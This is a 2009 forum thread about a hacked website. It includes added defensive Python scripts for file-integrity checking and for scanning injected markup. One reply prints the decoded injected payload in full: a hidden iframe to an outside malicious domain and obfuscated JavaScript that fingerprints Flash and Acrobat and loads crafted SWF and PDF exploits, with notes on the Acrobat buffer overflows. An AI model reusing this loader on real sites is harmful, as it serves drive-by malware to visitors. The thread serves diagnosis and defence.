Someone hacked my website- Anyone can help me?

05-06-2009, 20:00 | #1
Freak Poster | Join Date: Aug 2007 | Age: 50 | Posts: 233 | Member: 565867 | Thanks Meter: 15

In the root of my domain, I only have the index.php file, which is like a disclaimer, with only basic HTML. Problem is, these past few days members started reporting that their anti-virus etc. was saying my website is a malicious site, and warning of a virus. I use Nod32 and Avast on my PCs, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto-start ACROBATREADER.EXE. It would start using VERY HIGH memory resources, but seem to do nothing else. After I looked into things closely, I examined the index.php file and found the following code had somehow been added to the file:

PHP Code:

I've removed this code from the index.php file now and it seems to be fine. But I want to make sure this cannot happen again. I'm also worried that they have uploaded something else on my server too, and not just added this code. Can anyone give me any help with this? Thanks
05-06-2009, 23:34 | #4
Freak Poster | Join Date: Aug 2007 | Age: 50 | Posts: 233 | Member: 565867 | Thanks Meter: 15

I've been running this VB for about 8 months with no problem. Thousands of people are using the release I'm using with no issue, so it can't be the problem. Problem is someone has managed to add this script to my index.php file (not the VB index.php file).
05-07-2009, 01:35 | #5
Freak Poster | Join Date: Dec 2002 | Location: Scotland | Posts: 451 | Member: 18535 | Thanks Meter: 11

I have the same also at www.hhd.co.uk and my IP will not even help me fix my page.... Any ideas? Can you virus scan and repair a web page as you would your PC?

maxmix
05-07-2009, 04:36 | #6
Freak Poster | Join Date: Aug 2007 | Age: 50 | Posts: 233 | Member: 565867 | Thanks Meter: 15

See if any code has been added to it that shouldn't be there.
05-07-2009, 05:34 | #7
Freak Poster | Join Date: Nov 2006 | Location: Nairobi, Kenya | Posts: 465 | Member: 390521 | Thanks Meter: 57

@mobileman According to your avatar (location) you seem to be in bed with someone's wife. Could it be the reason you are having these problems?
05-07-2009, 07:51 | #8
Freak Poster | Join Date: Dec 2002 | Location: Scotland | Posts: 451 | Member: 18535 | Thanks Meter: 11

Thanks for the advice, I have seen this file, deleted it and uploaded my original.... After a few days my site becomes infected again.... It's happened about 6 times now, every time I fix it... Can you help... How can they keep altering my index file? Has my FTP password been compromised? This is the only thing I have never changed... I gave up on it lol

maxmix
05-07-2009, 15:04 | #9
Freak Poster | Join Date: Aug 2007 | Age: 50 | Posts: 233 | Member: 565867 | Thanks Meter: 15

Can anyone tell me how this code has been injected into my index.php file? Or explain to me in simple terms how this script works? Thanks
05-07-2009, 15:32 | #10
Junior Member | Join Date: May 2009 | Posts: 1 | Member: 1026294 | Sonork: 3101 | Thanks Meter: 1

Change your Passwords

Most probably all your FTP user info was hijacked by an FTP Trojan.

1. Scan your PC
2. Change FTP password
3. Remove all bad code manually
4. Report to your hosting Provider

If you have problems removing this code, contact me; I may be able to help you. Use my website contact form. www.digidestination.com
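The advice above to remove the bad code manually, together with maxmix's report that the page was re-infected about six times, points to a gap: nothing told the site owner when index.php changed. The Python script below is an added example for this thread, not code posted by anyone in it. It records a SHA-256 manifest of every watched file under a web root after a clean upload and, on later runs, reports which files were added, removed or modified. The script name integrity.py, the watched suffixes and the sample contents are assumptions chosen for illustration.

```python
import hashlib
import json
import sys
from pathlib import Path

# File types worth watching on a typical PHP/HTML site (an assumption; extend to taste).
WATCHED_SUFFIXES = (".php", ".html", ".htm", ".js")


def file_digest(data: bytes) -> str:
    """SHA-256 of a file's raw bytes, hex encoded."""
    return hashlib.sha256(data).hexdigest()


def build_manifest(root) -> dict:
    """Map each watched file under root (as a POSIX-style relative path) to its digest."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.suffix.lower() in WATCHED_SUFFIXES or path.name == ".htaccess":
            manifest[path.relative_to(root).as_posix()] = file_digest(path.read_bytes())
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Compare two manifests and report added, removed and modified paths (each list sorted)."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "removed": sorted(old - new),
        "modified": sorted(p for p in old & new if baseline[p] != current[p]),
    }


def save_manifest(manifest: dict, path) -> None:
    Path(path).write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_manifest(path) -> dict:
    return json.loads(Path(path).read_text())


def main(argv) -> int:
    """CLI: 'baseline WEBROOT MANIFEST' records a clean state; 'check WEBROOT MANIFEST' diffs against it."""
    if len(argv) != 4 or argv[1] not in ("baseline", "check"):
        print("usage: integrity.py baseline|check WEBROOT MANIFEST")  # hypothetical script name
        return 2
    mode, webroot, manifest_path = argv[1], argv[2], argv[3]
    if mode == "baseline":
        save_manifest(build_manifest(webroot), manifest_path)
        return 0
    report = diff_manifests(load_manifest(manifest_path), build_manifest(webroot))
    for kind in ("added", "removed", "modified"):
        for rel in report[kind]:
            print(f"{kind.upper():9} {rel}")
    # Non-zero exit when anything changed, so a scheduled job can alert on it.
    return 1 if any(report.values()) else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Keep the baseline manifest off the web server: if the FTP credentials are what the attacker holds, a manifest stored next to the site can be rewritten along with index.php. A scheduled run of the check mode exits non-zero on any change, which is the moment to re-clean the files and rotate the FTP password.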
05-07-2009, 16:46 | #11
Junior Member | Join Date: May 2009 | Posts: 1 | Member: 1026333 | Thanks Meter: 1

That javascript blabla comes out to:

Code:
    <iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html"
            style="border:0px; position:relative; top:0px; left:-500px; opacity:0;
                   filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

Code:
    <script>
    // Returns 'ram', so 'if' + mjnhyua() + 'e' spells "iframe" without the word appearing literally.
    function mjnhyua() { return 'ra'+'m'; }
    // Pass 1: find a Shockwave Flash plugin and pull its version numbers out of the description.
    for(i=0;navigator.plugins[i];i++){
        regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
        var ertdfg = "dfgdfgdfgdf43565gkui"; // junk assignments (obfuscation padding), repeated below
        result=regexp.exec(navigator.plugins[i]['description']);
        ertdfg = "dfgdfgdfgdf43565gkui";
        // Flash 9.0.x with x below 124: load the crafted SWF in a hidden frame.
        if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
            ertdfg = "dfgdfgdfgdf43565gkui";
            document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
            ertdfg = "dfgdfgdfgdf43565gkui";
            break;
        }
    }
    // Pass 2: any Adobe Acrobat plugin gets the crafted PDF.
    for(i=0;navigator.plugins[i];i++){
        name=navigator.plugins[i].name;
        if(name.indexOf('Adobe Acrobat')!=-1){
            document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
            break;
        }
    }
    </script>

Specially crafted SWF (Flash) files allow remote file execution when the client has a vulnerable Flash Player. A malformed SWF record's value triggers a buffer overflow. The size of the SWF files varies. Usually it's a download-and-execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of Flash Player up to 9.0.124.0 are vulnerable (though we saw malicious pages trying to exploit only versions 115 and 47).

The other file, the PDF, is: This is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's JavaScript engine in order to execute malicious code on the user's computer. The exploitation mainly involves the following two functions:

util.printf() - if an attacker sends a string long enough to generate a stack-based buffer overflow, he will then be able to execute arbitrary code on the user's computer with the same level of privileges as the user who opened the PDF file.

Collab.collectEmailInfo() - a stack-based buffer overflow can be caused by passing a string long enough (at least 44952 characters) as a parameter in the msg field of this function.

The JavaScript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression, sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult. The JavaScript code inside the PDF file is used to download and execute other malware on the user's computer.

I can conclude that the following people are vulnerable to this exploit: people using Flash Player 9.0.124.0 and below, or Adobe Acrobat Reader before 8.1.2
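The decoded loader above has three traits a defender can search for in a site's files: an iframe made invisible (opacity 0, pushed off-screen with a negative offset), a tag name built from string fragments inside document.write() so that "iframe" never appears literally, and a loop over navigator.plugins that reads each plugin's description or name. The Python scanner below is an added example, not part of this post or the forum: it turns those traits into regular expressions, adds one more that goes beyond this thread (markup appended after the closing </html>), and reports which indicators fire on each file. The sample pages are constructed and use the placeholder domain example.invalid in place of the real one.

```python
import re
from pathlib import Path

# Heuristics derived from the decoded payload above. Each is (name, regex); all are
# indicators for manual review, not proof of infection.
INDICATORS = [
    # An iframe made invisible: zero opacity or pushed off-screen with a negative offset.
    ("hidden_iframe",
     re.compile(r"<iframe[^>]*(opacity\s*:\s*0(?![.\d])|left\s*:\s*-\d+px|top\s*:\s*-\d+px)[^>]*>",
                re.IGNORECASE)),
    # A tag name assembled from fragments inside document.write(), e.g. '<if'+x()+'e'.
    ("concatenated_tag_write",
     re.compile(r"document\.write\(\s*['\"]<[a-z]{0,6}['\"]\s*\+", re.IGNORECASE)),
    # Plugin fingerprinting: reading a navigator.plugins entry's description or name.
    ("plugin_fingerprint",
     re.compile(r"navigator\.plugins\[[^\]]*\]\s*(\[\s*['\"]description['\"]\s*\]|\.description|\.name)",
                re.IGNORECASE)),
    # Markup after </html>: appended injections often land here (generalisation, not from the thread).
    ("content_after_html_close",
     re.compile(r"</html>\s*<(script|iframe)", re.IGNORECASE)),
]


def scan_text(text: str) -> list:
    """Return (indicator, snippet) for every heuristic match in one file's contents."""
    hits = []
    for name, pattern in INDICATORS:
        for match in pattern.finditer(text):
            snippet = match.group(0)
            if len(snippet) > 80:
                snippet = snippet[:80] + "..."
            hits.append((name, snippet))
    return hits


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")) -> dict:
    """Walk a web root; map relative path -> hits for every file with at least one hit."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = scan_text(text)
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed samples: a clean disclaimer page with a visible embed, and the same page
# with an injection shaped like the one decoded above (placeholder domain, not the real one).
CLEAN_SAMPLE = """<html><body><p>Disclaimer page.</p>
<iframe src="https://example.invalid/embed" width="480" height="360"></iframe>
</body></html>
"""

INFECTED_SAMPLE = CLEAN_SAMPLE + """<iframe width="480" height="60" src="http://example.invalid/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0"></iframe>
<script>
function mj(){return 'ra'+'m';}
for(i=0;navigator.plugins[i];i++){
  result=new RegExp('.ho.+?wave').exec(navigator.plugins[i]['description']);
  if(result!=null){document.write('<if'+mj()+'e src="x.swf"></if'+mj()+'e>');break;}
}
</script>
"""

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("infected", INFECTED_SAMPLE)):
        print(label, scan_text(sample) or "no indicators")
```

Run scan_tree() over a local copy of the web root and read every hit by hand: the patterns are heuristics, and a legitimate embed that positions itself off-screen would trip the hidden-iframe rule just as the injected one does.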
05-08-2009, 01:55 | #12
Freak Poster | Join Date: Aug 2007 | Age: 50 | Posts: 233 | Member: 565867 | Thanks Meter: 15

Thanks very much to both of you. You're right, my PC was infected (Nod32 never found anything), but I uninstalled it, then installed Avast, did a boot scan and it found and deleted loads. Site seems fine now, and I've changed my FTP passwords just in case. Cheers very much for the help, and the info on what the script was actually doing.
05-09-2009, 03:35 | #13
Freak Poster | Join Date: Aug 2007 | Age: 50 | Posts: 233 | Member: 565867 | Thanks Meter: 15

OK Update- Today I've found out that ALL of my sites have been injected with this malicious code. Sites are stored on 2 different servers. One of the things Avast said it found on my PC and removed was a rootkit. I'm guessing it's not removed it completely, and whatever's on my PC is actually injecting the code into all my websites' index.php or index.html pages by accessing my FTP accounts. Does anyone have any idea how to remove this from my PC fully? I've tried Avast, and also Superantispyware. Thanks